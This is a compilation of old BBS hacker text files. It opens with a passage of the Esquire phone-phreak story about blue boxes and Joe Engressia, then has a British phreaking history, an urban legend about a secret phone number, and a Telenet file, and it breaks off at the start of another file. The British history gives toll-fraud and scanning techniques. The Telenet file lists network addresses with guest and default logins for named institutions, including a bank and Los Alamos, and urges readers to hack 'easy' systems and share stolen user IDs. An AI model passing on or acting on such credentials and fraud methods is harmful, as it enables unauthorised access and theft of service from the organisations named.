M-F his way into other computers with complete anonymity, and without charge;
program and re-program them at will; feed them false or misleading information;
tap and steal from them.  He explained to me that he taps computers by busying
out all the lines, then going into a verification trunk, listening into the
passwords and instructions one of the time sharers uses, and them M-F-ing in
and imitating them.  He believes it would not be impossible to creep into the
F.B.I's crime control computer through a local police computer terminal and
phreak around with the F.B.I.'s memory banks.  He claims he has succeeded in
re-programming a certain huge institutional computer in such a way that it has
cordoned off an entire section of its circuitry for his personal use, and at
the same time conceals that arrangement from anyone else's notice.  I have been
unable to verify this claim.

Like Captain Crunch, like Alexander Graham Bell (pseudonym of a
disgruntled-looking East Coast engineer who claims to have invented the black
box and now sells black and blue boxes to gamblers and radical heavies), like
most phone phreaks, Gilbertson began his career trying to rip off pay phones as
a teenager.  Figure them out, then rip them off.  Getting his dime back from
the pay phone is the phone phreak's first thrilling rite of passage.  After
learning the usual eighteen different ways of getting his dime back, Gilbertson
learned how to make master keys to coin-phone cash boxes, and get everyone
else's dimes back.  He stole some phone-company equipment and put together his
own home switchboard with it.  He learned to make a simple "bread-box" device,
of the kind used by bookies in the Thirties (bookie gives a number to his
betting clients; the phone with that number is installed in some widow lady's
apartment, but is rigged to ring in the bookie's shop across town, cops trace
big betting number and find nothing but the widow).

Not long after that afternoon in 1968 when, deep in the stacks of an
engineering library, he came across a technical journal with the phone tone
frequencies and rushed off to make his first blue box, not long after that
Gilbertson abandoned a very promising career in physical chemistry and began
selling blue boxes for $1,500 apiece.

"I had to leave physical chemistry.  I just ran out of interesting things to
learn," he told me one evening.  We had been talking in the apartment of the
man who served as the link between Gilbertson and the syndicate in arranging
the big $300,000 blue-box deal which fell through because of legal trouble.
There has been some smoking.

"No more interesting things to learn," he continues.  "Physical chemistry turns
out to be a sick subject when you take it to its highest level.  I don't know.
I don't think I could explain to you how it's sick.  You have to be there.  But
you get, I don't know, a false feeling of omnipotence.  I suppose it's like
phone-phreaking that way.  This huge thing is there.  This whole system.  And
there are holes in it and you slip into them like Alice and you're pretending
you're doing something you're actually not, or at least it's no longer you
that's doing what you thought you were doing.  It's all Lewis Carroll.
Physical chemistry and phone-phreaking.  That's why you have these phone-phreak
pseudonyms like The Cheshire Cat, the Red King, and The Snark.  But there's
something about phone-phreaking that you don't find in physical chemistry."  He
looks up at me:

"Did you ever steal anything?"

"Well yes, I..."

"Then you know!  You know the rush you get.  It's not just knowledge, like
physical chemistry.  It's forbidden knowledge.  You know.  You can learn about
anything under the sun and be bored to death with it. But the idea that it's
illegal.  Look: you can be small and mobile and smart and you're ripping off
somebody large and powerful and very dangerous."

People like Gilbertson and Alexander Graham Bell are always talking about
ripping off the phone company and screwing Ma Bell.  But if they were shown a
single button and told that by pushing it they could turn the entire circuitry
of A.T.&T. into molten puddles, they probably wouldn't push it.  The
disgruntled-inventor phone phreak needs the phone system the way the lapsed
Catholic needs the Church, the way Satan needs a God, the way The Midnight
Skulker needed, more than anything else, response.

Later that evening Gilbertson finished telling me how delighted he was at the
flood of blue boxes spreading throughout the country, how delighted he was to
know that "this time they're really screwed."  He suddenly shifted gears.

"Of course.  I do have this love/hate thing about Ma Bell.  In a way I almost
like the phone company.  I guess I'd be very sad if they were to disintegrate.
In a way it's just that after having been so good they turn out to have these
things wrong with them.  It's those flaws that allow me to get in and mess with
them, but I don't know.  There's something about it that gets to you and makes
you want to get to it, you know."

I ask him what happens when he runs out of interesting, forbidden things to
learn about the phone system.

"I don't know, maybe I'd go to work for them for a while."

"In security even?"

"I'd do it, sure.  I just as soon play -- I'd just as soon work on either
side."

"Even figuring out how to trap phone phreaks? I said, recalling Mark Bernay's
game."

"Yes, that might be interesting.  Yes, I could figure out how to outwit the
phone phreaks.  Of course if I got too good at it, it might become boring
again.  Then I'd have to hope the phone phreaks got much better and outsmarted
me for a while.  That would move the quality of the game up one level.  I might
even have to help them out, you know, 'Well, kids, I wouldn't want this to get
around but did you ever think of -- ?' I could keep it going at higher and
higher levels forever."

The dealer speaks up for the first time.  He has been staring at the soft
blinking patterns of light and colors on the translucent tiled wall facing him.
(Actually there are no patterns: the color and illumination of every tile is
determined by a computerized random-number generator designed by Gilbertson
which insures that there can be no meaning to any sequence of events in the
tiles.)

"Those are nice games you're talking about," says the dealer to his friend.
"But I wouldn't mind seeing them screwed.  A telephone isn't private anymore.
You can't say anything you really want to say on a telephone or you have to go
through that paranoid bullshit.  'Is it cool to talk on the phone?' I mean,
even if it is cool, if you have to ask 'Is it cool,' then it isn't cool.  You
know.  'Is it cool,' then it isn't cool.  You know.  Like those blind kids,
people are going to start putting together their own private telephone
companies if they want to really talk.  And you know what else.  You don't hear
silences on the phone anymore.  They've got this time-sharing thing on
long-distance lines where you make a pause and they snip out that piece of time
and use it to carry part of somebody else's conversation.  Instead of a pause,
where somebody's maybe breathing or sighing, you get this blank hole and you
only start hearing again when someone says a word and even the beginning of the
word is clipped off. Silences don't count -- you're paying for them, but they
take them away from you.  It's not cool to talk and you can't hear someone when
they don't talk.  What the hell good is the phone?  I wouldn't mind seeing them
totally screwed."

The Big Memphis Bust

Joe Engressia never wanted to screw Ma Bell.  His dream had always been to work
for her.

The day I visited Joe in his small apartment on Union Avenue in Memphis, he was
upset about another setback in his application for a telephone job.

"They're stalling on it.  I got a letter today telling me they'd have to
postpone the interview I requested again.  My landlord read it for me.  They
gave me some runaround about wanting papers on my rehabilitation status but I
think there's something else going on."

When I switched on the 40-watt bulb in Joe's room -- he sometimes forgets when
he has guests -- it looked as if there was enough telephone hardware to start a
small phone company of his own.

There is one phone on top of his desk, one phone sitting in an open drawer
beneath the desk top.  Next to the desk-top phone is a cigar-box-size M-F
device with big toggle switches, and next to that is some kind of switching and
coupling device with jacks and alligator plugs hanging loose.  Next to that is
a Braille typewriter.  On the floor next to the desk, lying upside down like a
dead tortoise, is the half-gutted body of an old black standard phone.  Across
the room on a torn and dusty couch are two more phones, one of them a
touch-tone model; two tape recorders; a heap of phone patches and cassettes,
and a life-size toy telephone.

Our conversation is interrupted every ten minutes by phone phreaks from all
over the country ringing Joe on just about every piece of equipment but the toy
phone and the Braille typewriter.  One fourteen-year-old blind kid from
Connecticut calls up and tells Joe he's got a girl friend.  He wants to talk to
Joe about girl friends. Joe says they'll talk later in the evening when they
can be alone on the line.  Joe draws a deep breath, whistles him off the air
with an earsplitting 2600-cycle whistle. Joe is pleased to get the calls but he
looked worried and preoccupied that evening, his brow constantly furrowed over
his dark wandering eyes.  In addition to the phone-company stall, he has just
learned that his apartment house is due to be demolished in sixty days for
urban renewal.  For all its shabbiness, the Union Avenue apartment house has
been Joe's first home-of-his-own and he's worried that he may not find another
before this one is demolished.

But what really bothers Joe is that switchmen haven't been listening to him.
"I've been doing some checking on 800 numbers lately, and I've discovered that
certain 800 numbers in New Hampshire couldn't be reached from Missouri and
Kansas.  Now it may sound like a small thing, but I don't like to see sloppy
work; it makes me feel bad about the lines.  So I've been calling up switching
offices and reporting it, but they haven't corrected it.  I called them up for
the third time today and instead of checking they just got mad.  Well, that
gets me mad.  I mean, I do try to help them.  There's something about them I
can't understand -- you want to help them and they just try to say you're
defrauding them."

It is Sunday evening and Joe invites me to join him for dinner at a Holiday
Inn.  Frequently on Sunday evening Joe takes some of his welfare money, calls a
cab, and treats himself to a steak dinner at one of Memphis' thirteen Holiday
Inns.  (Memphis is the headquarters of Holiday Inn.  Holiday Inns have been a
favorite for Joe ever since he made his first solo phone trip to a Bell
switching office in Jacksonville, Florida, and stayed in the Holiday Inn there.
He likes to stay at Holiday Inns, he explains, because they represent freedom
to him and because the rooms are arranged the same all over the country so he
knows that any Holiday Inn room is familiar territory to him.  Just like any
telephone.)

Over steaks in the Pinnacle Restaurant of the Holiday Inn Medical Center on
Madison Avenue in Memphis, Joe tells me the highlights of his life as a phone
phreak.

At age seven, Joe learned his first phone trick.  A mean baby-sitter, tired of
listening to little Joe play with the phone as he always did, constantly, put a
lock on the phone dial.  "I got so mad.  When there's a phone sitting there and
I can't use it... so I started getting mad and banging the receiver up and
down.  I noticed I banged it once and it dialed one.  Well, then I tried
banging it twice...." In a few minutes Joe learned how to dial by pressing the
hook switch at the right time.  "I was so excited I remember going 'whoo whoo'
and beat a box down on the floor."

At age eight Joe learned about whistling.  "I was listening to some intercept
non working-number recording in L.A.- I was calling L.A. as far back as that,
but I'd mainly dial non working numbers because there was no charge, and I'd
listen to these recordings all day.  Well, I was whistling 'cause listening to
these recordings can be boring after a while even if they are from L.A., and
all of a sudden, in the middle of whistling, the recording clicked off.  I
fiddled around whistling some more, and the same thing happened.  So I called
up the switch room and said, 'I'm Joe.  I'm eight years old and I want to know
why when I whistle this tune the line clicks off.'  He tried to explain it to
me, but it was a little too technical at the time.  I went on learning.  That
was a thing nobody was going to stop me from doing. The phones were my life,
and I was going to pay any price to keep on learning.  I knew I could go to
jail.  But I had to do what I had to do to keep on learning."

The phone is ringing when we walk back into Joe's apartment on Union Avenue.
It is Captain Crunch.  The Captain has been following me around by phone,
calling up everywhere I go with additional bits of advice and explanation for
me and whatever phone phreak I happen to be visiting.  This time the Captain
reports he is calling from what he describes as "my hideaway high up in the
Sierra Nevada."  He pulses out lusty salvos of M-F and tells Joe he is about to
"go out and get a little action tonight.  Do some phreaking of another kind, if
you know what I mean."  Joe chuckles.

The Captain then tells me to make sure I understand that what he told me about
tying up the nation's phone lines was true, but that he and the phone phreaks
he knew never used the technique for sabotage.  They only learned the technique
to help the phone company.

"We do a lot of troubleshooting for them.  Like this New Hampshire/Missouri
WATS-line flaw I've been screaming about.  We help them more than they know."

After we say good-bye to the Captain and Joe whistles him off the line, Joe
tells me about a disturbing dream he had the night before: "I had been caught
and they were taking me to a prison.  It was a long trip.  They were taking me
to a prison a long long way away.  And we stopped at a Holiday Inn and it was
my last night ever using the phone and I was crying and crying, and the lady at
the Holiday Inn said, 'Gosh, honey, you should never be sad at a Holiday Inn.
You should always be happy here.  Especially since it's your last night.'  And
that just made it worse and I was sobbing so much I couldn't stand it."

Two weeks after I left Joe Engressia's apartment, phone-company security agents
and Memphis police broke into it.  Armed with a warrant, which they left pinned
to a wall, they confiscated every piece of equipment in the room, including his
toy telephone.  Joe was placed under arrest and taken to the city jail where he
was forced to spend the night since he had no money and knew no one in Memphis
to call.

It is not clear who told Joe what that night, but someone told him that the
phone company had an open-and-shut case against him because of revelations of
illegal activity he had made to a phone-company undercover agent.

By morning Joe had become convinced that the reporter from Esquire, with whom
he had spoken two weeks ago, was the undercover agent.  He probably had ugly
thoughts about someone he couldn't see gaining his confidence, listening to him
talk about his personal obsessions and dreams, while planning all the while to
lock him up.

"I really thought he was a reporter," Engressia told the Memphis Press-Seminar.
"I told him everything...." Feeling betrayed, Joe proceeded to confess
everything to the press and police.

As it turns out, the phone company did use an undercover agent to trap Joe,
although it was not the Esquire reporter.

Ironically, security agents were alerted and began to compile a case against
Joe because of one of his acts of love for the system: Joe had called an
internal service department to report that he had located a group of defective
long-distance trunks, and to complain again about the New Hampshire/Missouri
WATS problem.  Joe always liked Ma Bell's lines to be clean and responsive.  A
suspicious switchman reported Joe to the security agents who discovered that
Joe had never had a long-distance call charged to his name.

Then the security agents learned that Joe was planning one of his phone trips
to a local switching office.  The security people planted one of their agents
in the switching office.  He posed as a student switchman and followed Joe
around on a tour.  He was extremely friendly and helpful to Joe, leading him
around the office by the arm. When the tour was over he offered Joe a ride back
to his apartment house.  On the way he asked Joe -- one tech man to another --
about "those blue boxers" he'd heard about.  Joe talked about them freely,
talked about his blue box freely, and about all the other things he could do
with the phones.

The next day the phone-company security agents slapped a monitoring tape on
Joe's line, which eventually picked up an illegal call.  Then they applied for
the search warrant and broke in.

In court Joe pleaded not guilty to possession of a blue box and theft of
service.  A sympathetic judge reduced the charges to malicious mischief and
found him guilty on that count, sentenced him to two thirty-day sentences to be
served concurrently and then suspended the sentence on condition that Joe
promise never to play with phones again.  Joe promised, but the phone company
refused to restore his service.  For two weeks after the trial Joe could not be
reached except through the pay phone at his apartment house, and the landlord
screened all calls for him.

Phone-phreak Carl managed to get through to Joe after the trial, and reported
that Joe sounded crushed by the whole affair.

"What I'm worried about," Carl told me, "is that Joe means it this time.  The
promise.  That he'll never phone-phreak again.  That's what he told me, that
he's given up phone-phreaking for good.  I mean his entire life.  He says he
knows they're going to be watching him so closely for the rest of his life
he'll never be able to make a move without going straight to jail.  He sounded
very broken up by the whole experience of being in jail. It was awful to hear
him talk that way.  I don't know.  I hope maybe he had to sound that way.  Over
the phone, you know."

He reports that the entire phone-phreak underground is up in arms over the
phone company's treatment of Joe.  "All the while Joe had his hopes pinned on
his application for a phone-company job, they were stringing him along getting
ready to bust him.  That gets me mad.  Joe spent most of his time helping them
out.  The bastards.  They think they can use him as an example.  All of sudden
they're harassing us on the coast.  Agents are jumping up on our lines.  They
just busted ------'s mute yesterday and ripped out his lines.  But no matter
what Joe does, I don't think we're going to take this lying down."

Two weeks later my phone rings and about eight phone phreaks in succession say
hello from about eight different places in the country, among them Carl, Ed,
and Captain Crunch.  A nationwide phone-phreak conference line has been
reestablished through a switching machine in --------, with the cooperation of
a disgruntled switchman.

"We have a special guest with us today," Carl tells me.

The next voice I hear is Joe's.  He reports happily that he has just moved to a
place called Millington, Tennessee, fifteen miles outside of Memphis, where he
has been hired as a telephone-set repairman by a small independent phone
company.  Someday he hopes to be an equipment troubleshooter.

"It's the kind of job I dreamed about.  They found out about me from the
publicity surrounding the trial.  Maybe Ma Bell did me a favor busting me.
I'll have telephones in my hands all day long."

"You know the expression, 'Don't get mad, get even'?" phone-phreak Carl asked
me.  "Well, I think they're going to be very sorry about what they did to Joe
and what they're trying to do to us."

            (an excellent story presented here by Jolly Roger.
             Taken from the Official Hacker's Guide. Originally
             seen by myself in some book and I cannot remember
             the name of it.)




                           -->Courtesy of Exodus<--

                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                    $                                     $
                    $   THE HISTORY OF BRITISH PHREAKING  $
                    $   -=- -=-=-=- -- -=-=-=- -=-=-=-=-  $
                    $                                     $
                    $     THE SECOND IN A SERIES OF       $
                    $     THE HISTORY OF.....PHILES       $
                    $                                     $
                    $       WRITTEN AND UPLOADED BY:      $
                    $                                     $
                    $$$$$$$$$$$$-=>LEX LUTHOR<=-$$$$$$$$$$$
                    $                 AND                 $
                    $          THE LEGION OF DOOM!        $
                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

  NOTE:  THE BRITISH POST OFFICE, IS THE U.S.  EQUIVALENT OF MA BELL.

  IN BRITAIN, PHREAKING GOES BACK TO THE EARLY FIFTIES, WHEN THE TECHNIQUE OF
'TOLL A DROP BACK' WAS DISCOVERED.  TOLL A WAS AN EXCHANGE NEAR ST.  PAULS
WHICH ROUTED CALLS BETWEEN LONDON AND NEARBY NON-LONDON EXCHANGES.  THE TRICK
WAS TO DIAL AN UNALLOCATED NUMBER, AND THEN DEPRESS THE RECEIVER-REST FOR 1/2
SECOND.  THIS FLASHING INITIATED THE 'CLEAR FORWARD' SIGNAL, LEAVING THE CALLER
WITH AN OPEN LINE INTO THE TOLL A EXCHANGE.THE COULD THEN DIAL 018, WHICH
FORWARDED HIM TO THE TRUNK EXCHANGE AT THAT TIME, THE FIRST LONG DISTANCE
EXCHANGE IN BRITAIN AND FOLLOW IT WITH THE CODE FOR THE DISTANT EXCHANGE TO
WHICH HE WOULD BE CONNECTED AT NO EXTRA CHARGE.

  THE SIGNALS NEEDED TO CONTROL THE UK NETWORK TODAY WERE PUBLISHED IN THE
"INSTITUTION OF POST OFFICE ENGINEERS JOURNAL" AND REPRINTED IN THE SUNDAY
TIMES (15 OCT.  1972).

  THE SIGNALLING SYSTEM THEY USE:  SIGNALLING SYSTEM NO.  3 USES PAIRS OF
FREQUENCIES SELECTED FROM 6 TONES SEPARATED BY 120HZ.  WITH THAT INFO, THE
PHREAKS MADE "BLEEPERS" OR AS THEY ARE CALLED HERE IN THE U.S.  "BLUE BOX", BUT
THEY DO UTILIZE DIFFERENT MF TONES THEN THE U.S., THUS, YOUR U.S.  BLUE BOX
THAT YOU SMUGGLED INTO THE UK WILL NOT WORK, UNLESS YOU CHANGE THE
FREQUENCIES.

  IN THE EARLY SEVENTIES, A SIMPLER SYSTEM BASED ON DIFFERENT NUMBERS OF PULSES
WITH THE SAME FREQUENCY (2280HZ) WAS USED.  FOR MORE INFO ON THAT, TRY TO GET A
HOLD OF:  ATKINSON'S "TELEPHONY AND SYSTEMS TECHNOLOGY".

  IN THE EARLY DAYS OF BRITISH PHREAKING, THE CAMBRIDGE UNIVERSITY TITAN
COMPUTER WAS USED TO RECORD AND CIRCULATE NUMBERS FOUND BY THE EXHAUSTIVE
DIALING OF LOCAL NETWORKS.  THESE NUMBERS WERE USED TO CREATE A CHAIN OF LINKS
FROM LOCAL EXCHANGE TO LOCAL EXCHANGE ACROSS THE COUNTRY, BYPASSING THE TRUNK
CIRCUITS.  BECAUSE THE INTERNAL ROUTING CODES IN THE UK NETWORK ARE NOT THE
SAME AS THOSE DIALED BY THE CALLER, THE PHREAKS HAD TO DISCOVER THEM BY 'PROBE
AND LISTEN' TECHNIQUES OR MORE COMMONLY KNOWN IN THE U.S.-- SCANNING.  WHAT
THEY DID WAS PUT IN LIKELY SIGNALS AND LISTENED TO FIND OUT IF THEY SUCCEEDED.
THE RESULTS OF SCANNING WERE CIRCULATED TO OTHER PHREAKS. DISCOVERING EACH
OTHER TOOK TIME AT FIRST, BUT EVENTUALLY THE PHREAKS BECAME ORGANIZED.  THE
"TAP" OF BRITAIN WAS CALLED "UNDERCURRENTS" WHICH ENABLED BRITISH PHREAKS TO
SHARE THE INFO ON NEW NUMBERS, EQUIPMENT ETC.

  TO UNDERSTAND WHAT THE BRITISH BRITISH PHREAKS DID, THINK OF THE PHONE
NETWORK IN THREE LAYERS OF LINES:  LOCAL, TRUNK, AND INTERNATIONAL.#IN THE UK,
SUBSCRIBER TRUNK DIALING (STD), IS THE MECHANISM WHICH TAKES A CALL FROM THE
LOCAL LINES AND (LEGITIMATELY) ELEVATES IT TO A TRUNK OR INTERNATIONAL
LEVEL.#THE UK PHREAKS FIGURED THAT A CALL AT TRUNK LEVEL CAN BE ROUTED THROUGH
ANY NUMBER OF EXCHANGES, PROVIDED THAT THE RIGHT ROUTING CODES WERE FOUND AND
USED CORRECTLY.  THEY ALSO HAD TO DISCOVER HOW TO GET FROM LOCAL TO TRUNK LEVEL
EITHER WITHOUT BEING CHARGED (WHICH THEY DID WITH A BLEEPER BOX) OR WITHOUT
USING (STD).  CHAINING HAS ALREADY BEEN MENTIONED BUT IT REQUIRES LONG STRINGS
OF DIGITS AND SPEECH GETS MORE AND MORE FAINT AS THE CHAIN GROWS, JUST LIKE IT
DOES WHEN YOU STACK TRUNKS BACK AND FORTH ACROSS THE U.S.#THE WAY THE SECURITY
REPS SNAGGED THE PHREAKS WAS TO PUT A SIMPLE 'PRINTERMETER' OR AS WE CALL IT:
A PEN REGISTER ON THE SUSPECTS LINE, WHICH SHOWS EVERY DIGIT DIALED FROM THE
SUBSCRIBERS LINE.

  THE BRITISH PREFER TO GET ONTO THE TRUNKS RATHER THAN CHAINING.  ONE WAY WAS
TO DISCOVER WHERE LOCAL CALLS USE THE TRUNKS BETWEEN NEIGHBORING EXCHANGES,
START A CALL AND STAY ON THE TRUNK INSTEAD OF RETURNING TO THE LOCAL LEVEL ON
REACHING THE DISTANT SWITCH.  THIS AGAIN REQUIRED EXHAUSTIVE DIALING AND MADE
MORE WORK FOR TITAN; IT ALSO REVEALED 'FIDDLES', WHICH WERE INSERTED BY POST
OFFICE ENGINEERS.

  WHAT FIDDLING MEANS IS THAT THE ENGINEERS REWIRED THE EXCHANGES FOR THEIR OWN
BENEFIT.  THE EQUIPMENT IS MODIFIED TO GIVE ACCESS TO A TRUNK WITH OUT BEING
CHARGED, AN OPERATION WHICH IS PRETTY EASY IN STEP BY STEP (SXS)
ELECTROMECHANICAL EXCHANGES, WHICH WERE INSTALLED IN BRITAIN EVEN IN THE 1970S
(NOTE:  I KNOW OF A BACK DOOR INTO THE CANADIAN SYSTEM ON A 4A CO., SO IF YOU
ARE ON SXS OR A 4A, TRY SCANNING 3 DIGIT EXCHANGES, IE:  DIAL 999,998,997
ETC.#AND LISTEN FOR THE BEEP-KERCHINK, IF THERE ARE NO 3 DIGIT CODES WHICH
ALLOW DIRECT ACCESS TO A TANDEM IN YOUR LOCAL EXCHANGE AND BYPASSES THE AMA SO
YOU WON'T BE BILLED, NOT HAVE TO BLAST 2600 EVERY TIME YOU WISH TO BOX A CALL.

  A FAMOUS BRITISH 'FIDDLER' REVEALED IN THE EARLY 1970S WORKED BY DIALING 173.
THE CALLER THEN ADDED THE TRUNK CODE OF 1 AND THE SUBSCRIBERS LOCAL NUMBER.  AT
THAT TIME, MOST ENGINEERING TEST SERVICES BEGAN WITH 17X, SO THE ENGINEERS
COULD HIDE THEIR FIDDLES IN THE NEST OF SERVICE WIRES.  WHEN SECURITY REPS
STARTED SEARCHING, THE FIDDLES WERE CONCEALED BY TONES SIGNALLING:  'NUMBER
UNOBTAINALBE' OR 'EQUIPMENT ENGAGED' WHICH SWITCHED OFF AFTER A DELAY.  THE
NECESSARY RELAYS ARE SMALL AND EASILY HIDDEN.

  THERE WAS ANOTHER SIDE TO PHREAKING IN THE UK IN THE SIXTIES. BEFORE STD WAS
WIDESPREAD, MANY 'ORDINARY' PEOPLE WERE DRIVEN TO.

OCCASIONAL PHREAKING FROM SHEER FRUSTRATION AT THE INEFFICIENT OPERATOR
CONTROLLED TRUNK SYSTEM.  THIS CAME TO A HEAD DURING A STRIKE ABOUT 1961 WHEN
OPERATORS COULD NOT BE REACHED.  NOTHING COMPLICATED WAS NEEDED.  MANY
OPERATORS HAD BEEN IN THE HABIT OF REPEATING THE CODES AS THEY DIALLED THE
REQUESTED NUMBERS SO PEOPLE SOON LEARNT THE NUMBERS THEY CALLED FREQUENTLY.
THE ONLY 'TRICK' WAS TO KNOW WHICH EXCHANGES COULD BE DIALLED THROUGH TO PASS
ON THE TRUNK NUMBER.CALLERS ALSO NEEDED A PRETTY QUIET PLACE TO DO IT, SINCE
TIMING RELATIVE TO CLICKS WAS IMPORTANT THE MOST FAMOUS TRIAL OF BRITISH
PHREAKS WAS CALLED THE OLD BAILY TRIAL.#WHICH STARTED ON 3 OCT.  1973.#WHAT
THEY PHREAKS DID WAS TO DIAL A SPARE NUMBER AT A LOCAL CALL RATE BUT INVOLVING
A TRUNK TO ANOTHER EXCHANGE THEN THEY SEND A 'CLEAR FORWARD' TO THEIR LOCAL
EXCHANGE, INDICATING TO IT THAT THE CALL IS FINISHED;BUT THE DISTANT EXCHANGE
DOESN'T REALIZE BECAUSE THE CALLER'S PHONE IS STILL OFF THE HOOK.  THEY NOW
HAVE AN OPEN LINE INTO THE DISTANT TRUNK EXCHANGE AND SENDS TO IT A 'SEIZE'
SIGNAL:  '1' WHICH PUTS HIM ONTO ITS OUTGOING LINES NOW, IF THEY KNOW THE
CODES, THE WORLD IS OPEN TO THEM.  ALL OTHER EXCHANGES TRUST HIS LOCAL EXCHANGE
TO HANDLE THE BILLING; THEY JUST INTERPRET THE TONES THEY HEAR.  MEAN WHILE,
THE LOCAL EXCHANGE COLLECTS ONLY FOR A LOCAL CALL.  THE INVESTIGATORS
DISCOVERED THE PHREAKS HOLDING A CONFERENCE SOMEWHERE IN ENGLAND SURROUNDED BY
VARIOUS PHONE EQUIPMENT AND BLEEPER BOXES, ALSO PRINTOUTS LISTING 'SECRET' POST
OFFICE CODES.  (THEY PROBABLY GOT THEM FROM TRASHING?) THE JUDGE SAID:  "SOME
TAKE TO HEROIN, SOME TAKE TO TELEPHONES" FOR THEM PHONE PHREAKING WAS NOT A
CRIME BUT A HOBBY TO BE SHARED WITH PHELLOW ENTHUSIASTS AND DISCUSSED WITH THE
POST OFFICE OPENLY OVER DINNER AND BY MAIL.  THEIR APPROACH AND ATTITUDE TO THE
WORLDS LARGEST COMPUTER, THE GLOBAL TELEPHONE SYSTEM, WAS THAT OF SCIENTISTS
CONDUCTING EXPERIMENTS OR PROGRAMMERS AND ENGINEERS TESTING PROGRAMS AND
SYSTEMS.  THE JUDGE APPEARED TO AGREE, AND EVEN ASKED THEM FOR PHREAKING CODES
TO USE FROM HIS LOCAL EXCHANGE!!!

                    (Left Untouched as I got it...-----JR)

                    (Same Here... '94.   ----------Exodus)


             -------->Courtesy of The Black Gate BBS<--------
         
                               Bad as Shit

   Recently, a telephone fanatic in the northwest made an interesting
discovery.  He was exploring the 804 area code (Virginia) and found out that
the 840 exchange did something strange.
  In the vast majority of cases, in fact in all of the cases except one, he
would get a recording as if the exchange didn't exist. However, if he dialed
804-840 and four rather predictable numbers, he got a ring!

   After one or two rings, somebody picked up.  Being experienced at this 
kind of thing, he could tell that the call didn't "supe", that is, no charges 
were being incurred for calling this number.
  (Calls that get you to an error message, or a special operator, generally
don't supervise.)  A female voice, with a hint of a Southern accent said,
"Operator, can I help you?"

   "Yes," he said, "What number have I reached?"

   "What number did you dial, sir?"

   He made up a number that was similar.

   "I'm sorry that is not the number you reached."  Click.

   He was fascinated.  What in the world was this?  He knew he was going to
call back, but before he did, he tried some more experiments. He tried the 840
exchange in several other area codes.  In some, it came up as a valid exchange.
In others, exactly the same thing happened -- the same last four digits, the
same Southern belle.  Oddly enough, he later noticed, the areas worked in
seemed to travel in a beeline from Washington DC to Pittsburgh, PA.

   He called back from a payphone.  "Operator, can I help you?"

   "Yes, this is the phone company.  I'm testing this line and we don't seem to
have an identification on your circuit.  What office is this, please?"

   "What number are you trying to reach?"

   "I'm not trying to reach any number.  I'm trying to identify this circuit."

   "I'm sorry, I can't help you."

   "Ma'am, if I don't get an ID on this line, I'll have to disconnect it.  We
show no record of it here."

   "Hold on a moment, sir."

   After about a minute, she came back.  "Sir, I can have someone speak to you.
Would you give me your number, please?"

   He had anticipated this and he had the payphone number ready. After he gave
it, she said, "Mr. XXX will get right back to you."

   "Thanks."  He hung up the phone.  It rang.  INSTANTLY!  "Oh my God," he
thought, "They weren't asking for my number -- they were confirming it!"

   "Hello," he said, trying to sound authoritative.

   "This is Mr. XXX.  Did you just make  an inquiry to my office concerning a
phone number?"

   "Yes.  I need an identi--"

   "What you need is advice.  Don't ever call that number again. Forget you
ever knew it."

   At this point our friend got so nervous he just hung up.  He expected to
hear the phone ring again but it didn't.

   Over the next few days he racked his brains trying to figure out what the
number was.  He knew it was something big -- that was pretty certain at this
point.  It was so big that the number was programmed into every central office
in the country.  He knew this because if he tried to dial any other number in
that exchange, he'd get a local error message from his CO, as if the exchange
didn't exist.

   It finally came to him.  He had an uncle who worked in a federal agency.  He
had a feeling that this was government related and if it was, his uncle could
probably find out what it was.  He asked the next day and his uncle promised to
look into the matter.

   The next time he saw his uncle, he noticed a big change in his manner.  He
was trembling.  "Where did you get that number?!"  he shouted.  "Do you know I
almost got fired for asking about it?!? They kept wanting to know where I got
it."

   Our friend couldn't contain his excitement.  "What is it?" he pleaded.
"What's the number?!"

"IT'S THE PRESIDENT'S BOMB SHELTER!"

   He never called the number after that.  He knew that he could probably cause
quite a bit of excitement by calling the number and saying something like, "The
weather's not good in Washington.  We're coming over for a visit."  But our
friend was smart.  he knew that there were some things that were better off
unsaid and undone. 

     (A fucking great story from the Official Phreaker's Guide)

                         ------------EXODUS
Telenet                                       Courtesy of Exodus
                                              Orig. by JR

  It seems that not many of you know that Telenet is connected to about 80
computer-networks in the world. No, I don't mean 80 nodes, but 80 networks with
thousands of unprotected computers. When you call your local Telenet- gateway,
you can only call those computers which accept reverse-charging- calls.
  If you want to call computers in foreign countries or computers in USA which
do not accept R-calls, you need a Telenet-ID. Did you ever notice that you can
type ID XXXX when being connected to Telenet? You are then asked for the
password. If you have such a NUI (Network-User-ID) you can call nearly every
host connected to any computer-network in the world. Here are some examples:

026245400090184 :Is a VAX in Germany  (Username: DATEXP and leave mail for
CHRIS  !!!)
0311050500061   :Is the Los Alamos Integrated computing network (One of the
hosts connected to it is the DNA (Defense Nuclear Agency)!!!)
0530197000016   :Is a BBS in New Zealand
024050256       :Is the S-E-Bank in Stockholm, Sweden (Login as GAMES !!!)
02284681140541  :CERN in Geneva in Switzerland (one of the biggest nuclear
research centers in the world) Login as GUEST
0234212301161   :A Videotex-standard system. Type OPTEL to get in and use the
ID 999_ with the password 9_
0242211000001   :University of Oslo in Norway (Type  LOGIN 17,17  to play the
Multi-User-Dungeon !)
0425130000215   :Something like ITT Dialcom, but this one is in Israel ! ID
HELP  with password HELP  works fine with security level 3
0310600584401   :Is the Washington Post News Service via Tymnet (Yes, Tymnet is
connected to Telenet, too !)  ID and Password is: PETER You can read the news
of the next day !

The prefixes are as follows:
02624  is Datex-P in Germany
02342  is PSS in England
03110  is Telenet in USA
03106  is Tymnet in USA
02405  is Telepak in Sweden
04251  is Isranet in Israel
02080  is Transpac in France
02284  is Telepac in Switzerland
02724  is Eirpac in Ireland
02704  is Luxpac in Luxembourg
05252  is Telepac in Singapore
04408  is Venus-P in Japan
...and so on... Some of the countries have more than one
packet-switching-network (USA has 11, Canada has 3, etc).

OK. That should be enough for the moment. As you see most of the passwords are
very simple. This is because they must not have any fear of hackers. Only a few
German hackers use these networks. Most of the computers are absolutely easy to
hack !!! So, try to find out some Telenet-ID's and leave them here. If you need
more numbers, leave e-mail.
I'm calling from Germany via the German Datex-P network, which is similar to
Telenet. We have a lot of those NUI's for the German network, but none for a
special Tymnet-outdial-computer in USA, which connects me to any phone #.

CUL8R,  Mad Max

PS: Call 026245621040000 and type ID INF300 with password DATACOM to get more

Informations on packet-switching-networks !

PS2: The new password for the Washington Post is KING !!!!



`Fucking with the Operator                    courtesy of Exodus

           Ever get an operator who gave you a hard time, and you didn't know
